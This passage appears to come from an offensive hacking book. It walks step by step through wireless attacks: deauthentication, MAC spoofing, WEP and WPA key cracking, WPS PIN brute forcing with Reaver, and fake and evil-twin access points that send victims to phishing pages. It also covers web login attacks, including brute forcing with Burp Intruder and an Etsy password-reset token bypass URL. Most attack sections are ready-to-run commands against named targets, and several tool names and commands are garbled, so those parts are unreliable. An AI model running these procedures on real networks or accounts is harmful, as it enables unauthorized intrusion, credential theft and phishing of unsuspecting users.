Introducing Aircrack-ng Aircrack-ng is the heart of this chapter; it is a set of tools widely used to crack/recover WEP/WPA/ WPA2-PSK. It supports various attacks such as PTW, which can be used to decrypt WEP key with a less number of initialization vectors, and dictionary/brute force attacks, which can be used against WPA/WPA2-PSK. It includes a wide variety of tools such as packet sniffer and packet injector. The most common ones are airodump-ng, aireply-ng, and airmon-ng. Uncovering Hidden SSIDs It’s common practice for network administrators to disable broadcasting SSID. Normally, the SSIDs are sent in the form of beacon frames, but this does not happen when a network administrator disables an SSID. This is said to be a good security practice according to many Mail:mtahirzahid@yahoo.com

Page 38


Power Of Hacking network administrators; however, this terribly fails in real-world situations. The reason being that anytime a client reassociates with the access point, it will send the SSID parameter in plain text, which will reveal the real SSID. Now, we have two methods to do this: the first one is that we keep analyzing beacon frames and wait for the client to disconnect and reconnect to the access point; the second option is that we send disassociation packets by using a deauthentication attack, which will force everyone on the network to disconnect and then reconnect to the access point revealing to us the SSID. So let’s see this in action. Turning on the Monitor Mode The next thing we want to do is switch our network card into monitor mode. As mentioned in the “Network Sniffing� chapter (Chapter 6), to sniff on wired networks, we need to switch our network card into promiscous mode. However, to sniff on wireless networks, we need to make sure that our network card is in the monitor mode. One of the advantages of the Alpha card is that it allows us to sniff in the monitor mode, so you need to make sure that your network card is allowed to sniff in the montior mode for this work. We can use the following command to change the network card to the monitor mode: airmon-ng start wlan0

So now we can see that we have succesfully enabled monitor mode on the mon0 interface. We can use the iwconfig command to confirm all the interfaces that have monitor mode enabled. Mail:mtahirzahid@yahoo.com

Page 39


Power Of Hacking Monitoring Beacon Frames on Wireshark Now that we have the monitor mode enabled, we will sniff on the mon0 network interfaces, which will bring us beacon frames containing the SSID that is being broadcasted. If the SSID is not broadcasted, it won’t show up.

We selected the appropriate interface to sniff on, and we are now able to see beacon frames from other access points, which we are not associated with. Whenever the client authenticates against the access point with the hidden SSID, it will send an SSID parameter; therefore, we can easily figure out what the real SSID is.

Monitoring with Airodump-ng The easy way around is to use airodump-ng to start monitoring the traffic; as soon as the client authenticates, the SSID will be revealed. Command:

Mail:mtahirzahid@yahoo.com

Page 40


Power Of Hacking airodump-ng mon0

The access point that is not broadcasting it’s ESSID would appear with the names such as “<length: 0>”, as soon as the client would re-authenticate the hidden SSID would appear.

Speeding Up the Process In case we don’t want to wait for the client to disconnect and then reconnect, we can perform a deauthentication attack as explained earlier to force all the clients associated with that access point (which we want to target) to disconnect and then reconnect to the access point. Command: aireplay-ng -0 3 –a <macaddress of the ap> mon0 The –0 stands for the deauthentication attack followed by the number 3, which would send exactly three deauthentication packets. The –a parameter is used to specify the MAC address of the target access point, which in this case would be 64:70:02:8A:12:94, followed by our interface mon0. Bypassing MAC Filters on Wireless Networks Apart from hiding the SSID, it’s also a common practice for network administrators to apply MAC filtering on the access point so that only white-listed hosts with MAC addresses would be able to connect to the access point. This is done in colleges and universities where they only want registered students to have access to the Internet. MAC filtering is also a part of low-level security along with hiding the SSID; however, just like the hidden SSID, this security measure terribly fails in the real world, since an attacker can spoof a legitimate MAC address to connect to the access Mail:mtahirzahid@yahoo.com

Page 41


Power Of Hacking point. Here is how this attack would be carried out: 1. The attacker would scan the access point for the hosts that are already connected to the access point. 2. Next, the attacker would note down the MAC address of the legitimate client that is connected to the access point and spoof the MAC address to get into the white list and would be able to connect and use the access point. So here is how we would combine airodump-ng and macchanger to bypass MAC filtering restrictions: Note: Make sure that you already have monitor mode enabled before performing the following steps. Step 1—The first command we would use is “airodump-ng” to scan for all the neighbor networks. To demonstrate this attack, we would assume that the access point with ESSID “ROMEO” having a BSSID of “F4:3E:61:9c:77:3B” has enabled MAC filtering and only a set of allowed MAC addresses are able to connect to this access point.

Step 2—The next step would be to find a client that is already associated with the access point. We will use airodump to find it for us. Command: airodump-ng –c 1 –a –bssid F4:3E:61:9C:77:3B mon0 Since the access point is on channel 1, we would type –c 1; the “–a” parameter would display

Mail:mtahirzahid@yahoo.com

Page 42


Power Of Hacking clients that are currently associated with the access point.

The output shows us that two stations are currently up with MAC addresses B0:D0:9C:5C:EF:86 and 48:DC:FB:B1:F3:7D. Step 3—The final step would be to spoof our MAC address and change it to one of the client’s. We can use a neat program in BackTrack called macchanger, but for that, we would need to disable the monitor mode first. Command: airmon-ng stop wlan0

Next, we would use the following command to spoof our current MAC address. macchanger –m B0:D0:9C:5C:EF:86 wlan0

The MAC address of the client, B0:D0:9C:5C:EF:86, is already associated with the access point. Finally, we would issue the following command to bring the wlan0 interface up. Command: ifconfig wlan0 up

Mail:mtahirzahid@yahoo.com

Page 43


Power Of Hacking We can verify that our MAC address has been spoofed by executing “iwconfig” command and matching the HWaddr field.

So far, we have only discussed bypassing a low-level security on wireless networks like uncovering hidden SSIDs and bypassing MAC filters. Now we will dive into the main part of this chapter, where we will discuss cracking WEP, WPA, and WP2 keys. Cracking a WEP Wireless Network with Aircrack-ng WEP (Wired Equivalent Privacy) was one of the first authentication and encryption used for wireless networks; it’s been known to be insecure for a decade due to some cryptographic weaknesses related to initialization vectors, key management, etc., which we won’t discuss in this book, since it’s a completely different topic. Though it’s deprecated and should never be used, we still see it being used in lots of home networks, one of the reasons being the usage of very old routers that don’t support WPA, WPA2 encryption, the other reason being lack of awareness. So in this section, we will use aircrack-ng to demonstrate how easy it is to crack a WEP key no matter how complex it is. Placing Your Wireless Adapter in Monitor Mode Step 1—First things first: we need to make sure that our network card is placed into monitor mode, we have already learnt that we can use the “airmon-ng start wlan0” command to accomplish this task. We can use “iwconfig” to verify that our wireless adapter is now able

Mail:mtahirzahid@yahoo.com

Page 44


Power Of Hacking to sniff in monitor mode.

Determining the Target with Airodump-ng Step 2—Next, we will use airodump-ng to discover our neighbor networks with WEP encryption enabled. We can see our target with an essid (same as ssid) of “Linksys” and with BSSID of 98:FC:11:C9:14:22 and it’s on the channel 6. We should make a note of the essid, bssid, and channel because we will need them in future. Command: airodump-ng mon0

Attacking the Target Step 3—In order to crack the WEP key, we would need to capture of the contents of the data file and write it to a file which we can analyze later. To accomplish this task, we would use airodump and restrict our monitoring only to the access point (ap) we are targeting. Structure airodump-ng mon0 --bssid –c (channel) –w (file name to save) Mail:mtahirzahid@yahoo.com

Page 45


Power Of Hacking Command: airodump-ng mon0 --bssid 98:fc:11:c9:14:22 --channel 6 --write RHAWEP

We had to specify the bssid of the target that we learnt from the previous step, followed by the channel that the access point is on, which we also learnt from previous step (channel 6). The reason we want to restrict it to channel 6 is that we don’t want our wireless card to switch channels. Then we instruct it to write the results to a file called RHAWEP. The file would be in several formats, such as kismet, cap, etc., so that we can analyze it using different tools. What we are interested in is the contents of the cap file.

Speeding Up the Cracking Process Step 4—In order to decrypt the wep key, we would need data packets, but waiting to collect them would be time consuming. To speed up this process, we can use a fake authentication attack which will associate our MAC address with the access point. This attack is only useful in the case where we have no clients associated with the access point. Structure aireplay-ng - 1 3 –a (bssid of the target) (interface) Command:

Mail:mtahirzahid@yahoo.com

Page 46


Power Of Hacking aireplay-ng -1 3 –a 98:fc:11:c9:14:22 mon0

The –1 parameter specifies that we want to use a fake authentication attack followed by the number of times we want to send the authentication request, then the –a parameter followed by the BSSID of the target and the interface, which is mon0. Injecting ARP Packets Step 5—The success rate of our attack depends upon the number of initialization vectors we gather. A fake authentication attack does not generate ARP packets, therefore, we would need to use the attack number 3—“ARP Request Replay”—which is the most effective way of generating initialization vectors. Structure aireplay-ng 3 –b (bssid of target) –h (Mac address of mon0) (interface) Command: aireplay-ng -3 –b 98:fc:11:c9:14:22 –h 00:c0:ca:50:f8:32 mon0

The –3 stands for the “ARP Request REPLAY”, followed by the –b parameter, which would be the BSSID of the target. The –h parameter is new parameter that we haven’t used before, this would be the MAC address of the mon0 interface. Now, we will wait for the number of data packets to reach at least 20,000; the more packets Mail:mtahirzahid@yahoo.com

Page 47


Power Of Hacking the more quickly the key can be decrypted.

Cracking the WEP Step 6—Finally, it’s the time to decrypt the contents of the RHAWEP-0.1-cap file. We will use aircrack-ng to do this. Command: aircrack-ng RHAWEP-0.1-cap

So, we have successfully managed to decrypt the key, which is C3:6E:E8:F7:82. Just remove the colons from the output and you will be left with the original wep key, which in this case is C36EE8F782. Cracking a WPA/WPA2 Wireless Network Using Aircrack-ng As WEP has been deprecated since early 2001, WPA was introduced as an industry standard, which used TKIP for encryption of data. Later, WPA2 became an industry standard since it

Mail:mtahirzahid@yahoo.com

Page 48


Power Of Hacking introduced AES encryption, which is more powerful than TKIP; however, it also supports TKIP encryption. The WPA/WPA2 key that we would use to authenticate on a wireless network is used to generate another unique key. Five additional parameters would be added to our key to generate a unique key. The parameters are the SSID of the network authenticator, Nounce (ANounce), supplicant Nounce (SNounce), authenticator MAC address (access point MAC), and suppliant MAC address (WiFi client MAC). From a hacker’s perspective, we can use a brute force or dictionary attack or rainbow tables to crack a WPA/WPA2 network, obviously a dictionary attack is much less time consuming than other attacks; therefore it should be your first preference. The success rate of this attack depends upon the wordlist you would use. Another requirement for this attack to work is the four-way handshake, which takes place between a client and an access point, which we will capture using the deauthentication attack. Let’s see how we can use aircrack-ng to crack a WPA/WPA2 network: Step 1—First of all, ensure that your network card is inside the monitoring mode. Step 2—Next, we would listen on the mon0 interfaces for other access points having encryption set to either wpa or wpa2. We would use the “airmon-ng mon0” command to do it.

Our target AP would be Shaxter, which uses WPA as their encryption type. We will take a note of its BSSID and the channel that it’s on, this information would be useful in the upcoming steps. BSSID: F4:3E:61:92:68:D7 Mail:mtahirzahid@yahoo.com

Page 49


Power Of Hacking Channel: 6 Capturing Packets Step 3—Next, we need to save the data associated with our access point to a specific file. The inputs we need to specify are the channel, the bssid, and the file name to write. Command: airodump-ng –c 1 –w rhawap --bssid F4:3E:61:92:68:D7 mon0 ◾–w—File to write ◾–c—Channel

Capturing the Four-Way Handshake Step 4—In order to successfully crack WAP, we would need to capture the four-way handshake. As mentioned, to achieve this we could use a deauthentication attack to force clients to disconnect and reconnect with the access point. Structure aireplay-ng --deauth 10 –a ≤Target AP≥ –c ≤Mac address of Mon0≥mon0 Command:

Mail:mtahirzahid@yahoo.com

Page 50


Power Of Hacking aireplay-ng --deauth 10 –a F4:3E:61:92:68:D7 –c 94:39:E5:EA:85:31 mon0

After we have successfully performed a deauthentication attack, we will be able to capture the four-way handshake.

Cracking WPA/WAP2 Now that we have all the inputs required for cracking the WPA/WPA PSK, we will use aircrackng and specify a wordlist that would be used against the rhawap.cap file that was generated earlier. Remember that in order for us to successfully crack the WPA/WPA2 PSK, we need to make sure that our file contains the four-way handshake. Structure aircrack-ng –w Wordlist ‘capture_file’.cap Command: aircrack-ng rhawap.cap –w/pentest/passwords/wordlists/darkc0de.lst So, now this will start the dictionary attack against the rhawap.cap file, and if the key is found

Mail:mtahirzahid@yahoo.com

Page 51


Power Of Hacking in the dictionary, it will reveal it to us.

Using Reaver to Crack WPS-Enabled Wireless Networks Reaver is the penetration tester’s ultimate choice, this tool can help you crack WPA/WPA2 keys within a matter of hours. Reaver does not directly perform a brute force attack against the WPA/ WPA2 keys, but it performs a brute force attack against the WPS pins. The WPS pins are eight digits in length, and as most routers use default pins, they can easily be compromised. Once reaver compromises the pins by either using the default pins or by using a brute force attack, which won’t take much long since eight-digit pins would have 10,000,000 (10^7) and the last digit can be calculated by using the first seven pins according to official documentation. As reaver compromises the pins, it gets authenticated as a valid external registrar. A registrar has access to all the configurations of the access point, which would include the WPA/WPA2 keys. For this attack to work, the access point should have WPS enabled. The good thing is that we would have it enabled in most of the access points we encounter. Let’s see how we can use reaver to crack WPS-enabled wireless networks. Step 1—Make sure that your wireless card is in the monitor mode. Step 2—Next, we would use airodump-ng to select our target we want to attack.

Mail:mtahirzahid@yahoo.com

Page 52


Power Of Hacking

In this case we target the access point with ESSID PTCL-BB, and BSSID F4:3E:61:F5:FC:49. We will copy the BSSID, since this will be the only input required for reaver to work. Step 3—Now, we will use reaver to attack our access point. The command would be as follows: reaver –i mon0 –b F4:3E:61:F5:FC:49 –vv The –i parameter was used to specify the interface, which is mon0, followed by the –b parameter used to define the bssid and –vv for the verbosity. The verbosity is set to twice, which means that it will display each pin’s number as it’s tried against the access point.

Reducing the Delay We can tweak reaver into reducing the delay between the pins. The default delay is 1 s, but we can reduce it to 0 by specifying a –d parameter.

Mail:mtahirzahid@yahoo.com

Page 53


Power Of Hacking Command: reaver –i mon0 –b ≤bssid≥ –d 0 reaver –i mon0 –b ≤bssid≥ –d 0 Setting Up a Fake Access Point with SET to PWN Users The next attack we would talk about is setting up a rogue or fake access point. Our goal would be to make the victim connect to it, and since we will have control of the access point, we can redirect traffic as we want. We will use the SET to raise a fake access point. Though there are other tools that can be used here, such as airbase, gerrix, etc., I found SET to be the simplest. Step 1—From the “Social Engineering Attacks” menu, select the “Wireless Access Point attack

Vector.” 2—We can see from the description that we require four utilities to launch this attack

Step

vector, namely, Air-Base-NG, AirMon-NG, DNSSpoof, and dhcp3. Except for dhcp3, the other tools come preinstalled with BackTrack 5. Therefore, we would need to install dhcp3

Mail:mtahirzahid@yahoo.com

Page 54


Power Of Hacking in order to launch this attack vector.

Step 3—We would use “apt-get install dhcp3-server” command to install dhcp3 inside of BackTrack. It’s listed in the image, since I have already installed it. If you face any problems while installing the dhcp3 server, I would recommend you to consult the backtrack-linux. org forum.

Step 4—After you have installed the dhcp3 server, from the SET choose the first option to start setting the fake access point. Next, the SET will take you to the /etc/default/dhcp3-server file where you would need to specify the interface on which you would like the dhcp server to serve

Mail:mtahirzahid@yahoo.com

Page 55


Power Of Hacking the dhcp requests. We would now add our wireless interface “wlan0” for serving dhcp requests.

Step 5—Next, it will ask you for the dhcp range to assign to the clients that would connect to our access points. I would prefer choosing 192.168.10.100-254, since it’s used more often.

Step 6—Finally, we would enter our wireless network interface, which would be wlan0; yours might be different, you can do iwconfig to check for your wireless interfaces.

Now, we are all set and done and the SET will launch our fake access point with the SSID

Mail:mtahirzahid@yahoo.com

Page 56


Power Of Hacking “linksys�, which is its name by default. It will have no encryption set.

As a side note, if we would like to change the name of our wireless access point, we can do it by modifying the value of ACCESS_POINT_SSID parameter located inside the SET config file in the /pentest/exploits/set/config directory.

Attack Scenario Once the victim connects to our fake access point, we can perform various types of attacks against him. We can either perform an ARP poisoning attack or a phishing attack or just set up a malicious webserver to redirect all the traffic to our webserver, whenever the victim browses websites

Mail:mtahirzahid@yahoo.com

Page 57


Power Of Hacking such as facebook.com or google.com. This can be easily done by editing the contents of the /etc/ hosts file. Since we are in control of the access point, we can manipulate things that would be presented to the victim. 127.0.0.1 is our home address, so we would edit the /etc/hosts file to and we would point the hosts that we want to target say Facebook, Google, twitter etc to our Home address. So this means that the next time when victim would enter the target url in his browser say facebook.com he would be redirected to our address where we could launch different types of client side attacks (in the power of hacking book). The following screenshot explains how the edits would look like:

After you have manipulated the records, whenever the victim browses his favorite websites, say google.com, facebook.com, or yahoo.com, he will be redirected to our local IP address, where we would host our malicious SET webserver or a phishing page. You can also use evil grade to

Mail:mtahirzahid@yahoo.com

Page 58


Power Of Hacking compromise the client side updating process.

Evil Twin Attack An evil twin attack is a very popular type of social engineering attack against the client. The idea behind this attack is to create an access point with a name similar to what our victim’s and cause denial of service to the original access point. This would make our victim connect to our fake access point thinking that it’s the original. Furthermore an attacker would also spoof the MAC address of his interface to exactly match the MAC address of the real access point, so that it becomes much more difficult to detect. Let’s see how we would perform this attack in the real world: 1. We would use airodump-ng to scan for all neighboring access points. 2. We would note down the BSSID and change the MAC address of our interface to exactly match the BSSID of the real access point. 3. Then we would launch a fake access point with the same name as the original one. 4. Finally we would perform a deauthentication attack with mk3 or aireplay. Scanning the Neighbors We used the “airodump-ng mon0” command to scan for all the wireless networks. Let’s suppose our target access point is “$oulhunter”, which has a BSSID 20:10:7A:C6:49:DF and is on channel 11.

Mail:mtahirzahid@yahoo.com

Page 59


Power Of Hacking Spoofing the MAC The next task would be to spoof our MAC address with the MAC address (BSSID) of the victim’s access point. We can easily do this by using the macchanger, for which we would need to bring wlan0 interface down and then use the –m parameter to set our MAC address and then bring it up. This is discussed in more detail in the “Bypassing MAC filtering” section in this chapter. Commands: ifconfig wlan0 down - - Bringing the interfaces down so we can spoof the mac. macchanger –m 20:10:74:c6:49:df mon0 – Changing with our desired mac addresses. ifconfig mon0 up Setting Up a Fake Access Point The next step would be to set up a fake access point with the exact name “$oulhunter”. We have already learned how to do this, so I won’t go into the details now. Causing Denial of Service on the Original AP Our final step would be to cause a denial of service attack on the original ap, we could use aireplay to perform a deauthentication attack on the access point; however, here I will introduce you to a new tool called “mkd3”, which is specifically meant for causing denial of service to wireless access points. It supports a wide variety of flood attacks such as authentication flood and beacon flood. In this particular scenario, we will use mkd3 to launch a deauthentication attack to forcefully disconnect every client from the access point so they can connect to ours. Step 1—We would create a text file with the name “target” where we will specify the bssid of our target. The –d parameter would be used to specify a deauthentication attack; the –c parameter is used to specify the channel, which in this case would be 11 since my access point is on channel 11. Command:

Mail:mtahirzahid@yahoo.com

Page 60


Power Of Hacking mkd3 mon0 d –b target –c 11

Since the signal strength of our access point would be strong, our victim would connect to us and we can launch attacks against them. Conclusion In order to overcome physical limitations, more and more home and corporate users are moving toward wireless networks, without any concern for the issues that wireless networks can bring. Even though access points can be completely secure and the pre-shared keys complex enough that they can’t be cracked, there is still room for possible attacks on clients—the weakest links. Web Hacking:Attacking the Authentication Authentication in web security is an application to verify if it’s the correct user that accesses the private/protected information. In this section, we will talk about authentication-based attacks. Some of the common vulnerabilities against authentication are as follows: ◾Credentials sent over HTTP. Since they are unencrypted, an attacker on LAN/WLAN can launch an MITM attack. See Network Sniffing chapter (Chapter 6). ◾Default passwords. ◾Weak or simple credentials that can be cracked with brute force or dictionary attacks. ◾Bypassing authentication by using various vulnerabilities. ◾Abusing reset forgotten password functionality. ◾Passwords being stored in local storage, making it easy for an attacker to extract them by Mail:mtahirzahid@yahoo.com

Page 61


Power Of Hacking using XSS vulnerability. In this section, most of our focus would be on some of the commonly used vulnerabilities to bypass authentication such as SQL injection and Xpath injection. But before that, let’s talk about some low-profile attacks. Username Enumeration Sometimes it’s possible to check if a current user exists in the database or not based upon the error messages that the application displays. This could be very helpful in cases where you want to conduct a brute force attack or an attack against a particular user. It could also aid you when exploiting the password reset feature. Let’s take a look at an example of how this works. Invalid Username with Invalid Password We have a popular website xyz.com. When we enter an invalid username with an invalid password, the following error is displayed: “Username is invalid,” indicating that the particular username was not found in the website’s

database. Username with Invalid Password

Valid

When we enter a valid username with invalid password, the following error is displayed: “Password is incorrect.”

Valid Username with Invalid Password When we enter a valid username with invalid password, the following error is displayed:

Mail:mtahirzahid@yahoo.com

Page 62


Power Of Hacking “Password is incorrect.”

Not to mention, the website provided is well known; however, this isn’t a big issue for them because most of their usernames are already public in their forums, listings, and market places, but certainly, this can still be an issue in several other applications. Enabling Browser Cache to Store Passwords Another bad security practice that is often followed is developers using autocomplete function for password fields, which enables the passwords to be saved in browser cache allowing an attacker to access the password if he can somehow access the browser cache. We can check if autocomplete is enabled with the following command: <input type="text" name="foo" autocomplete="on"/> To protect against this issue, it’s recommended that the autocomplete be disabled. Brute Force and Dictionary Attacks In the Remote Exploitation chapter (Chapter 7), we discussed how we can use brute force or dictionary attacks to crack various services such as ftp, SSH, and RDP by using various tools such as hydra, Medusa, and ncrack. However, we didn’t talk about brute forcing HTTP protocol authentication schemes in Chapter 7 as it is more appropriate to discuss here. Types of Authentication Let’s talk about some of the authentication mechanisms and their insecurities before looking at brute force attacks. There are three types of HTTP-based authentication schemes used primarily: HTTP Basic Authentication HTTP basic authentication is one of the first authentication mechanisms that were introduced. It works as follows: When we send a GET request to the protected resource, the webserver would respond with a

Mail:mtahirzahid@yahoo.com

Page 63


Power Of Hacking log-in screen, which would set a “WWW-Authenticate” header also known as the authorization header. Our credentials are then sent to the server via the authorization header in the base64encoded form. Upon receiving the header, the server would decode the base64 string to plain text and compare it with the information stored in the authorization file. Upon submitting a correct username and password, the client would get access to the protected storage, and a “401” “Unauthorized” response from the server if an incorrect username/password is submitted. Now, obviously, the problem with this type of authentication is that an attacker could launch a man in the middle attack and easily decode the encoded base64 string containing the username and the password. Let’s try analyzing it in our favorite web proxy called “burp suite.” If you haven’t set up burp suite, I would recommend you to see the “Information Gathering Techniques” chapter (Chapter 3), where I have explained step by step how to install and run burp suite.

As we can see, a base64 string is being sent to the server, which the server would decode and match with the password set in .htaccess in case you are on an apache webserver. Let’s try sending the string to burp’s decoder.

In the decoder, you would see a drop-down menu, which would ask you for the type of string

Mail:mtahirzahid@yahoo.com

Page 64


Power Of Hacking

that is submitted as an input. We will select base64. decode the contents of the base64 string, which happen to be

It would successfully

admin:password in this case, where “admin” is the username and “password” is the password.

HTTP-Authentication http authentication was the modified and improved version of HTTP basic authentication. One of the major improvements was that it sent the password in an encrypted form. The HTTP protocol is similar to NTLM protocol, it is discuss in previous power of hacking book. It uses MD5 hashing algorithm to encrypt the credentials, nonce (a random value) and the url, and they are sent to the server. However, MD5 hashes are also prone to vulnerabilities and could be cracked easily. So this is not the protocol to rely on for authentication, although it does make it a bit difficult for an attacker, since the attacker has to crack the MD5 hash to obtain the credentials. Form-Based Authentication Form-based authentication is the recommended method for authenticating a user. The credentials are submitted by either POST or GET method over an HTTP or HTTPS protocol. Although Mail:mtahirzahid@yahoo.com

Page 65


Power Of Hacking it’s not a good security practice to send sensitive credentials by GET method as they can be easily leaked via referrer header or other attack, we still see it being used. When the credentials are submitted, the server compares them with the ones that are saved in the database and authenticates the user if they are correct. If the Webmaster is using an encryption such as MD5 hash to store the passwords, then the passwords that are submitted by users are first encrypted to MD5 or the hashing algorithm that the Webmaster is using and then compared to the ones that are stored in the database. HTTP is a plain text protocol, which means that everything that is sent across it goes as plain text, which leaves it vulnerable to eavesdropping or MITM attacks. Therefore, for authentication purposes and where sensitive data are transmitted, “HTTPS” is used although some websites don’t implement it on all pages since it takes much of server resources. Insufficient transport layer protection was in the list of OWASP top 10 for 2012 although it was eliminated from the list in 2013. There are tons of websites that do implement HTTPS but not in a proper way. They use HTTP for the initial log-in and then change it to HTTPS. Since the initial part of the communication is left unencrypted, it’s still vulnerable to eavesdropping or MITM attack. An example follows: Etsy.com is a popular website and secures a good spot in Alexa Top 200, and it uses https for

encrypted communications. However, the website doesn’t implement it correctly; when we try to log in to the website and click on the “Sign in” button, the form loads upon http, and after we enter the credentials, it is changed to https, which means that the initial communication is left unencrypted.

Mail:mtahirzahid@yahoo.com

Page 66


Power Of Hacking

Another issue that I often see with websites is using old and deprecated versions of SSL. SSL 2.0 was deprecated long time ago, since lots of weaknesses were found in the protocol as it used weak ciphers. Today, it’s recommended to use SSL 3.0 or TLS 1.0, though there have been known issues with SSL 3.0. It’s the same with TLS 1.0, so TLS 1.2 is recommended instead. However, we don’t see it being implemented much since old browsers don’t support it. We can use a neat tool in BackTrack called “SSL Scan,” which would help us identify websites that use outdated SSL versions. Since this is already discussed in the “Information Gathering Techniques” is discuss on previous book power of hacking. , it won’t be covered here; instead we will talk about a great Firefox add-on called “Calomel Scan”, which can easily help you identify weak implementation of SSL. Based on the SSL cipher strength, the scan gives a grade color; normally the grade that shows red color indicates a weak implementation of SSL in your application.

Exploiting Password Reset Feature Mail:mtahirzahid@yahoo.com

Page 67


Power Of Hacking Every website that supports authentication would surely have a password reset feature where users can reset their passwords for their accounts. There is no one single bug that could exploit the password reset feature, the reason being that the applications may be coded in different ways, unless you find a password reset bug in a content management system that would exploit all the websites running that content management system, such as WordPress and Joomla. One of the popular bugs with Joomla was a password reset vulnerability where the token was not checked on the server end; there have been similar known issues with WordPress, Drupal, etc. You can review more technical details from the following link: ◾http://www.exploit-db.com/exploits/6234/

Etsy.com Password Reset Vulnerability Etsy.com back in 2012 was suffering from the same password reset vulnerability. The issue, found by a security researcher, Yogesh Jaygadkar, was a token that was supposed to check if it’s the same id requesting for a new password was not being validated on the server side. This is a very common issue you would find with many websites. Here is the request that the etsy.com users made when they applied for a new password: https://www.etsy.com/confirm.php?email=[Email Address]&code=[Token code]&action= reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_ password_1. The user e-mail address and token code are the areas of interest; the user would enter an e-mail address, and the valid token would check if it’s a valid request, which would have been the normal behavior of this application, but in this case, the token is not being validated at server side, so all that the attacker would need to do is to remove the token field and enter the victim’s e-mail address

Mail:mtahirzahid@yahoo.com

Page 68


Power Of Hacking instead of his own. The request would look like the following: https://www.etsy.com/confirm.php?email=*victim’s email ID+&action=reset_password&utm_ source=account&utm_medium=trans_email&utm_campaign=forgot_password_1.

Another thing to check with the generated tokens are if they are predictable; if so, then an attacker can easily guess the tokens and reset the victim’s password. Attacking Form-Based Authentication Step 1—Our first step would be to perform username enumeration; this can be easily done by entering an incorrect password with the username you want to check is present in the database. In this case, we found that the username “admin” exists.

Mail:mtahirzahid@yahoo.com

Page 69


Power Of Hacking

Step 2—Next, we would trap the authentication request with burp suite and then press “Ctrl+I” to send it to the intruder.

Step 3—Burp would automatically highlight the input fields that you can try to run your attack against; however, we are interested only in the password field with the parameter (pwd). So we will click on the “Clear” button at the right to clear all the inputs and click the “Add” button twice. Finally, we would choose is the “attack type.” Burp suite supports multiple attack types; a description of all the attack types can be found on the burp suite’s official documentation, for which I will provide the link later. For the sake of this demonstration, we will choose “Sniper”;

Mail:mtahirzahid@yahoo.com

Page 70


Power Of Hacking this attack type is useful when we are trying to inject our payloads into a single position.

Step 4—We will now move to the “payloads” tab, and under payloads options, we will load our wordlist against which we want to test this particular form. For demonstration purpose, I would use the list of top 500 worst passwords by Symantec, for which I will provide the

link later. everything set up, we will click on “Intruder” at the top and click on

Step 5—Once we have

“Start Attack,” and it will try the wordlist against our target.

On the 15th request, we see a difference between the content length and the status, which probably means that we can correctly guess our password. Please note that the success rate of this Mail:mtahirzahid@yahoo.com

Page 71


Power Of Hacking attack solely depends upon the quality of your wordlist. Brute Force Attack To launch a brute force attack, we need to make a slight change in the “Payloads” tab. We will change the payload type to “Brute forcer”. We will make modifications to the charset and length depending upon the requirement; as you increase the max length, the total number of permutations would increase. So in this, we would use the lower alphanumeric charset, which would contain all the letters and numbers from 0 to 9, and we would set the minimum and maximum length to 4. You may increase it if you want. Note: Please note that brute force attacks are pretty slow, and most of the time you would not be performing them in a penetration test, as they can take a significant amount of time and resources if you are brute forcing a complex password.

That’s pretty much it; from the “Intruder” tab, you would click on “Start Attack,” and it would try all possible combinations of alphanumeric charset up to a maximum character

Mail:mtahirzahid@yahoo.com

Page 72


Power Of Hacking

length of 4. Attacking HTTP Basic Auth

The method for attacking an HTTP basic authentication would be different, since we need to send a base64-encoded payload, which the server could decode and compare with the .htpasswd file. Also, the username and the password that would be encoded and sent to the server should be separated by colon for our attack to work. Step 1—We will start by intercepting the authentication, and then send it to burp intruder.

Step 2—Again, by default, burp intruder would pinpoint the possible positions to be bruteforced; however, we are interested in attacking only the authorization header that would be

Mail:mtahirzahid@yahoo.com

Page 73


Power Of Hacking sent to the server, so we would click the “Add” button to lock the position.

Step 3—The next step would be to define the usernames that would be used to brute force. We would choose the payload type to custom iterator so we can add our separator and add the usernames that we want to test. Also, in the “Separator for Position 1,” we will add a colon.

Step 4—Next, we would need to select the password that we are testing the usernames against;

Mail:mtahirzahid@yahoo.com

Page 74


Power Of Hacking for that, we select number “2” from the drop-down menu holding the name “positions.”

Step 5—Finally, we need to encode our payload with base64 encoding, for which we need to define a rule under the “Payload Processing” tab. To add a rule, select rule type to “Encode” and encoding type to “Base64-encode.”

Information Gathering Techniques:In general, all information gathering techniques can be classified into two main categories: 1. Active information gathering 2. Passive information gathering Sources of Information Gathering There are many sources of information; the most important ones are as follows: Social media website Search engines Forums Press releases Mail:mtahirzahid@yahoo.com

Page 75


Power Of Hacking People search Job sites Copying Websites Locally There are many tools that can be used to copy websites locally; however, one of the most comprehensive tool is httrack. It can be used to investigate the website further. For example, let’s suppose that the file permissions of a configuration file are not set properly. The configuration might reveal some important information, for example, username and password, about the target.

If you are on Linux, you can use Wget command to copy a webpage locally. Another great tool is Website Ripper Copier, which has a few additional functions than

Mail:mtahirzahid@yahoo.com

Page 76


Power Of Hacking httrack.

Tracing the Location:You would need to know the IP address of the webserver in order to trace the exact location. There are several methods to figure it out. We will use the simplest one, that is, the ping command. Ping command sends icmp echo requests to check if the website is up. It’s used for network troubleshooting purposes. From your command line, type the following: ping www.techlotips.com The output would be as follows: C:\Users\ Tahir>ping www.tahirhacker.com Pinging tahirhacker.com [40.22.81.62] with 32 bytes of data: Reply from 40.22.81.62: bytes = 32 time = 304ms TTL = 47 Reply from 40.22.81.62: bytes = 32 time = 282ms TTL = 47 Reply from 40.22.81.62: bytes = 32 time = 291ms TTL = 47

Mail:mtahirzahid@yahoo.com

Page 77


Power Of Hacking Reply from 40.22.81.62: bytes = 32 time = 297ms TTL = 47 So we now know that the IP address of our target is 40.22.81.62. After determining the webserver’s IP, we can use some online tools to track the exact location of the webserver. One such tool is IPTracer that is available at http://www.ip-adress.com/ip_tracer/yourip Just replace your IP with your target’s IP, and it will show you the exact location of the webserver via Google Maps.

Traceroute Traceroute is a very popular utility available in both Windows and Linux. It is used for network orientation. By network orientation I don’t mean scanning a host for open ports or scanning for services running on a port. It means to figure out how the network topology, firewalls, load balancers, and control points, etc. are implemented on the network. A traceroute uses a TTL (time to live) field from the IP header, and it increments the IP packet in order to determine where the system is. The time to live value decreases every time it reaches a hop on the network (i.e. router to server is one hop). There are three different types of traceroutes: 1. ICMP traceroute (which is used in Windows by default) 2. TCP traceroute Mail:mtahirzahid@yahoo.com

Page 78


Power Of Hacking 3. UDP traceroute ICMP Traceroute Microsoft Windows by default uses ICMP traceroute; however, after a few hops, you will get a timeout, which indicates that there might be a device like IDS or firewall that is blocking ICMP echo requests.

